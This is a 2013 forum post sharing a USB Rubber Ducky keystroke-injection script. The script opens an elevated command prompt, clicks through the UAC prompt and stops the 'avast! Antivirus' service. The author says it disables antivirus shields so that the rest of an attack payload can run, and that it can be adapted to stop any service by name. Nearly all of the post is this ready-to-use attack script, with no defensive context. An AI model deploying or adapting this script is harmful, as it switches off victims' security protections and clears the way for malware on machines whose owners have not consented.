buzbee Posted November 8, 2013 Share Posted November 8, 2013 (edited) Not much to be said here. Stops avast! Antivirus shields to allow payload to fully execute. Could very easily be modified to stop any running services by name. DELAY 15000 REM This script will use an elevated command prompt to stop a service. REM I personally use this script to stop avast! Antivirus so I can execute the rest of my payload. GUI d DELAY 500 GUI r DELAY 500 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING net stop "avast! Antivirus" ENTER DELAY 1000 LEFTARROW LEFTARROW LEFTARROW DELAY 500 ENTER DELAY 1000 STRING exit ENTER The end lines are for confirmation that you want avast shields to be shut down If using this to stop another service please comment out the following line or change them to what is needed. LEFTARROW LEFTARROW LEFTARROW DELAY 500 ENTER That is all, thanks for looking at my script! Edited November 8, 2013 by buzbee Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.